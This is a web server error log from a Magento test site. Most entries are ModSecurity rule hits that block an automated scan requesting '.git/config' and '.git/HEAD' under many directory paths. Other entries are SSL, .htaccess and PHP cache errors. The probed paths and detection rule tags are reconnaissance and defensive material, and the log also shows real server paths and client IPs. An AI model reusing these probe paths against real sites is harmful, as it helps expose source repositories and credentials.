[Sat Jul 29 05:51:01.512679 2023] [:error] [pid 1029471] [client 18.222.143.90:45278] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz6QAAAAg"]
[Sat Jul 29 05:51:01.512795 2023] [:error] [pid 1026837] [client 18.222.143.90:45062] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/m/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5eqAAAAAU"]
[Sat Jul 29 05:51:01.513122 2023] [:error] [pid 1028943] [client 18.222.143.90:45204] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old-cuburn/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/old-cuburn/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QgAAAAY"]
[Sat Jul 29 05:51:01.513286 2023] [:error] [pid 1028943] [client 18.222.143.90:45204] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/old-cuburn/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QgAAAAY"]
[Sat Jul 29 05:51:01.513402 2023] [:error] [pid 1028943] [client 18.222.143.90:45204] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/old-cuburn/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QgAAAAY"]
[Sat Jul 29 05:51:01.516698 2023] [authz_core:error] [pid 1026830] [client 18.222.143.90:45050] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Sat Jul 29 05:51:01.518498 2023] [:error] [pid 1026833] [client 18.222.143.90:45342] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /static/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/static/.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72PAAAAAQ"]
[Sat Jul 29 05:51:01.518714 2023] [:error] [pid 1026833] [client 18.222.143.90:45342] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/static/.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72PAAAAAQ"]
[Sat Jul 29 05:51:01.518855 2023] [:error] [pid 1026833] [client 18.222.143.90:45342] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/static/.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72PAAAAAQ"]
[Sat Jul 29 05:51:01.525557 2023] [:error] [pid 1026829] [client 18.222.143.90:45148] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wiki/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNqQAAAAA"]
[Sat Jul 29 05:51:01.525769 2023] [:error] [pid 1026829] [client 18.222.143.90:45148] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNqQAAAAA"]
[Sat Jul 29 05:51:01.525908 2023] [:error] [pid 1026829] [client 18.222.143.90:45148] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNqQAAAAA"]
[Sat Jul 29 05:51:01.626890 2023] [:error] [pid 1026832] [client 18.222.143.90:45356] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /developer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/developer/.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCFQAAAAM"]
[Sat Jul 29 05:51:01.627158 2023] [:error] [pid 1026832] [client 18.222.143.90:45356] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/developer/.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCFQAAAAM"]
[Sat Jul 29 05:51:01.627348 2023] [:error] [pid 1026832] [client 18.222.143.90:45356] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/developer/.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCFQAAAAM"]
[Sat Jul 29 05:51:01.697071 2023] [:error] [pid 1026831] [client 18.222.143.90:45128] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYgAAAAI"]
[Sat Jul 29 05:51:01.697327 2023] [:error] [pid 1026831] [client 18.222.143.90:45128] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYgAAAAI"]
[Sat Jul 29 05:51:01.697477 2023] [:error] [pid 1026831] [client 18.222.143.90:45128] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYgAAAAI"]
[Sat Jul 29 05:51:01.698705 2023] [:error] [pid 1029472] [client 18.222.143.90:45390] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /store/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/store/.git/config"] [unique_id "ZMSMpX17sYnopBCfenbq1wAAAAk"]
[Sat Jul 29 05:51:01.698951 2023] [:error] [pid 1029472] [client 18.222.143.90:45390] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/store/.git/config"] [unique_id "ZMSMpX17sYnopBCfenbq1wAAAAk"]
[Sat Jul 29 05:51:01.699083 2023] [:error] [pid 1029472] [client 18.222.143.90:45390] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/store/.git/config"] [unique_id "ZMSMpX17sYnopBCfenbq1wAAAAk"]
[Sat Jul 29 05:51:01.704804 2023] [:error] [pid 1029473] [client 18.222.143.90:44984] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "ZMSMpe_C8YnenBeejlHC6gAAAAo"]
[Sat Jul 29 05:51:01.705056 2023] [:error] [pid 1029473] [client 18.222.143.90:44984] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "ZMSMpe_C8YnenBeejlHC6gAAAAo"]
[Sat Jul 29 05:51:01.705201 2023] [:error] [pid 1029473] [client 18.222.143.90:44984] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "ZMSMpe_C8YnenBeejlHC6gAAAAo"]
[Sat Jul 29 05:51:01.750680 2023] [:error] [pid 1029094] [client 18.222.143.90:45000] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v3/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAgAAAAc"]
[Sat Jul 29 05:51:01.750945 2023] [:error] [pid 1029094] [client 18.222.143.90:45000] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v3/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAgAAAAc"]
[Sat Jul 29 05:51:01.751103 2023] [:error] [pid 1029094] [client 18.222.143.90:45000] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v3/.git/config"] [unique_id "ZMSMpbZKcTjH6iUwxOkyAgAAAAc"]
[Sat Jul 29 05:51:01.754192 2023] [:error] [pid 1026837] [client 18.222.143.90:45304] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /s3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5eqQAAAAU"]
[Sat Jul 29 05:51:01.754417 2023] [:error] [pid 1026837] [client 18.222.143.90:45304] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5eqQAAAAU"]
[Sat Jul 29 05:51:01.754555 2023] [:error] [pid 1026837] [client 18.222.143.90:45304] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5eqQAAAAU"]
[Sun Jul 30 01:01:41.583128 2023] [ssl:error] [pid 1040391] [client 137.226.113.15:50936] AH02261: Re-negotiation handshake failed
[Sun Jul 30 01:01:41.583182 2023] [ssl:error] [pid 1040391] SSL Library Error: error:14094153:SSL routines:ssl3_read_bytes:no renegotiation
[Fri Aug 04 15:42:39.897313 2023] [ssl:error] [pid 1130652] [client 137.226.113.15:35054] AH02261: Re-negotiation handshake failed
[Fri Aug 04 15:42:39.898236 2023] [ssl:error] [pid 1130652] SSL Library Error: error:14094153:SSL routines:ssl3_read_bytes:no renegotiation
[Fri Aug 11 11:56:13.890793 2023] [:error] [pid 1233677] [client 45.135.57.88:39289] [client 45.135.57.88] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZNYFvZemsyBFK37rXsFAIgAAAAM"], referer: http://economiasolidale.38121.it/.git/HEAD
[Fri Aug 11 11:56:13.891102 2023] [:error] [pid 1233677] [client 45.135.57.88:39289] [client 45.135.57.88] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZNYFvZemsyBFK37rXsFAIgAAAAM"], referer: http://economiasolidale.38121.it/.git/HEAD
[Fri Aug 11 11:56:13.891312 2023] [:error] [pid 1233677] [client 45.135.57.88:39289] [client 45.135.57.88] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZNYFvZemsyBFK37rXsFAIgAAAAM"], referer: http://economiasolidale.38121.it/.git/HEAD
[Mon Aug 14 10:54:06.218905 2023] [ssl:error] [pid 1292255] [client 137.226.113.15:45344] AH02261: Re-negotiation handshake failed
[Mon Aug 14 10:54:06.223835 2023] [ssl:error] [pid 1292255] SSL Library Error: error:14094153:SSL routines:ssl3_read_bytes:no renegotiation
[Wed Aug 16 14:50:06.129164 2023] [ssl:error] [pid 1333183] [client 137.226.113.15:42990] AH02261: Re-negotiation handshake failed
[Wed Aug 16 14:50:06.129221 2023] [ssl:error] [pid 1333183] SSL Library Error: error:14094153:SSL routines:ssl3_read_bytes:no renegotiation
[Thu Aug 24 15:26:25.653241 2023] [core:alert] [pid 1468352] [client 151.27.210.117:56968] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://www.economiasolidaletrentina.it/
[Thu Aug 24 15:26:35.568121 2023] [core:alert] [pid 1468601] [client 151.27.210.117:56971] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://www.economiasolidaletrentina.it/
[Thu Aug 24 15:26:52.677028 2023] [core:alert] [pid 1468350] [client 151.27.210.117:56977] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled.
[Thu Aug 24 15:26:53.493530 2023] [core:alert] [pid 1467820] [client 151.27.210.117:56979] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://economiasolidale.38121.it/bb/loadbutton/index/access/6733f1af4dbc12f39ab4812ab0b0048cb15882db
[Thu Aug 24 15:27:19.218804 2023] [core:alert] [pid 1467802] [client 151.27.210.117:56996] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled.
[Thu Aug 24 15:27:19.523033 2023] [core:alert] [pid 1467741] [client 151.27.210.117:56997] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://economiasolidale.38121.it/bb/loadbutton/index/access/6733f1af4dbc12f39ab4812ab0b0048cb15882db
[Thu Aug 24 15:27:31.062570 2023] [core:alert] [pid 1468569] [client 151.27.210.117:57003] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled.
[Thu Aug 24 15:27:31.385996 2023] [core:alert] [pid 1468351] [client 151.27.210.117:57004] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://economiasolidale.38121.it/bb/loadbutton/index/access/6733f1af4dbc12f39ab4812ab0b0048cb15882db
[Thu Aug 24 15:27:53.229569 2023] [core:alert] [pid 1468577] [client 151.27.210.117:57019] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled.
[Thu Aug 24 15:27:53.548465 2023] [core:alert] [pid 1468589] [client 151.27.210.117:57020] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://economiasolidale.38121.it/bb/loadbutton/index/access/6733f1af4dbc12f39ab4812ab0b0048cb15882db
[Thu Aug 24 15:27:59.569832 2023] [core:alert] [pid 1468352] [client 151.27.210.117:57025] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled.
[Thu Aug 24 15:28:00.433935 2023] [core:alert] [pid 1468601] [client 151.27.210.117:57027] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://economiasolidale.38121.it/
[Thu Aug 24 15:28:09.527965 2023] [core:alert] [pid 1468350] [client 151.27.210.117:57032] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled.
[Thu Aug 24 15:28:10.234347 2023] [core:alert] [pid 1467820] [client 151.27.210.117:57033] /var/www/magento.test.indacotrentino.com/www/.htaccess: SetEnvIf regex could not be compiled., referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.263244 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.308688 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.376532 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.376567 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
